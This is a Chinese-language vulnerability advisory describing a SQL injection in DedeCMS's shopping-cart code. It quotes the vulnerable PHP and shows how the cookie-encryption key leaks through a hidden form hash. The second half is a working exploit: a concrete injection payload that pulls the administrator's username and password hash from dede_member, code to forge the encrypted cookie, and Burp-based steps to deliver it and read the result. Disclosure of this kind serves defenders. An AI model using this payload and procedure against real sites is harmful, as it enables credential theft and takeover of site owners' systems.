DedeCMS SQL注入

1. 发布时间：2016-08-21
2. 公开时间：N/A
3. 漏洞类型：SQL注入
4. 危害等级：高
5. 漏洞编号：xianzhi-2016-08-39374560
6. 测试版本：N/A

---

漏洞详情

plus/carbuyaction.php

    $Items = $cart->getItems();
    if(empty($Items))
    {
        ShowMsg("您的购物车中没有商品！","-1");
        exit();
    }
    …………
    foreach($Items as $key=>$val)
                {
                    $val['price'] = str_replace(",","",$val['price']);
                    $dsql->ExecuteNoneQuery("INSERT INTO #@__shops_products (aid,oid,userid,title,price,buynum)
                    VALUES ('$val[id]','$OrdersId','$userid','$val[title]','$val[price]','$val[buynum]');");
                }
                $sql = "INSERT INTO #@__shops_userinfo (userid,oid,consignee,address,zip,tel,email,des)
                 VALUES ('$userid','$OrdersId','$postname','$address','$zip','$tel','$email','$des');
                ";
                $dsql->ExecuteNoneQuery($sql);

include/shopcar.class.php

    function getItems()
    {
        $Products = array();
        foreach($_COOKIE as $key => $vals)
        {
            if(preg_match("#".DE_ItemEcode."#", $key) && preg_match("#[^_0-9a-z]#", $key))
            {
                parse_str($this->deCrypt($vals), $arrays);
                $values = @array_values($arrays);
                if(!empty($values))
                {
                    $arrays['price'] = sprintf("%01.2f", $arrays['price']);
                    if($arrays['buynum'] < 1)
                    {
                        $arrays['buynum'] = 0;
                    }
                    $Products[$key] = $arrays;
                }
            }
        }
        unset($key,$vals,$values,$arrays);
        return $Products;
    }

可以看到 item来自cookie 经过decrypt之后直接进了sql 再来看看decrypt函数

 function deCrypt($txt)
    {
        return $this->mchStrCode($txt,'DECODE');
    }
    
    function mchStrCode($string, $operation = 'ENCODE') 
    {
        $key_length = 4;
        $expiry = 0;
        $key = md5($GLOBALS['cfg_cookie_encode']);
        $fixedkey = md5($key);
        $egiskeys = md5(substr($fixedkey, 16, 16));
        $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
        $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
        $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
        $i = 0; $result = '';
        $string_length = strlen($string);
        for ($i = 0; $i < $string_length; $i++){
            $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
        }
        if($operation == 'ENCODE') {
            return $runtokey . str_replace('=', '', base64_encode($result));
        } else {
            if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
                return substr($result, 26);
            } else {
                return '';
            }
        }
    }

mchStrCode函数其实就是dz的authcode函数的简化版 虽然简化了 但足够用来防止篡改数据 这里用到的key是cfg_cookie_encode 在安装的时候初始化 用在很多校验用户输入的地方 如果能够搞到这个key 就能伪造cookie实现注入 member/inc/inc_archives_functions.php

function PrintAutoFieldsAdd(&$fieldset, $loadtype='all', $isprint=TRUE)
{
    global $cfg_cookie_encode;
    $dtp = new DedeTagParse();
    $dtp->SetNameSpace('field','<','>');
    $dtp->LoadSource($fieldset);
    $dede_addonfields = '';
    $addonfieldsname = '';
    if(is_array($dtp->CTags))
    {
        foreach($dtp->CTags as $tid=>$ctag)
        {
            if($loadtype!='autofield' ||  $ctag->GetAtt('autofield')==1 )
            {
                $dede_addonfields .= ( $dede_addonfields=="" ? $ctag->GetName().",".$ctag->GetAtt('type') : ";".$ctag->GetName().",".$ctag->GetAtt('type') );
                $addonfieldsname .= ",".$ctag->GetName();
                if ($isprint) echo  GetFormItemA($ctag);
            }
        }
    }
    if ($isprint) echo "<input type='hidden' name='dede_addonfields' value=\"".$dede_addonfields."\">\r\n";
    echo "<input type=\"hidden\" name=\"dede_fieldshash\" value=\"".md5($dede_addonfields.$cfg_cookie_encode)."\" />";
    // 增加一个返回
    return $addonfieldsname;
}

可以看到 当loadtype='autofield'的时候 $dede_addonfields始终不会被添加 所以md5($dede_addonfields.$cfg_cookie_encode)实际上就是md5($cfg_cookie_encode) 搜了一下很多地方都这样调用 比如member\templets\article_add.htm

<label>缩略图：</label>
            <input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);"  maxlength="100" class="intxt"/>
          </p>
      <?php
       //自定义字段
       PrintAutoFieldsAdd($cInfos['fieldset'],'autofield');
      ?>
    </div>
        <!— 表单操作区域 —>
        <h3 class="meTitle">详细内容</h3>
        <div cla

md5($cfg_cookie_encode)刚好就是mchStrCode函数的$key

$key = md5($GLOBALS['cfg_cookie_encode']);

具体操作

1. 注册账号（或者系统开启匿名投稿）
2. 访问http://192.168.1.170/dedecms/member/article_add.php 查看源码

<label>缩略图：</label>
<input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);"  maxlength="100" class="intxt"/>
</p>
<input type='hidden' name='dede_addonfields' value="">
<input type="hidden" name="dede_fieldshash" value="e344ea979d3dbdc2e9bf1c3541e63308" />    </div>
<!— 表单操作区域 —>
<h3 class="meTitle">详细内容</h3>

得到 md5($GLOBALS['cfg_cookie_encode'])=e344ea979d3dbdc2e9bf1c3541e63308 3.用这个key生成cookie

$inject = 'id=82\',\'.``.aid,8, (select concat(uname,0x3a,pwd) from dede_member where mid =1),1,1)#';
echo urlencode(mchStrCode($inject));
/
记得先把mchStrCode函数中的
$key = md5($GLOBALS['cfg_cookie_encode']);
改为
$key = 'e344ea979d3dbdc2e9bf1c3541e63308';
————————————————
$inject中的id改成物品id 
aid,后面的8改成自己的uid

4. 去前台随便找一个商品添加购物车 下一步 随便填收货信息 下一步 burp拦下来
5. 修改cookie值Shop_De_xx=为上一步生成的cookie 发送
6. 访问 http://192.168.1.170/dedecms/member/shops_products.php?do=show 查看注入结果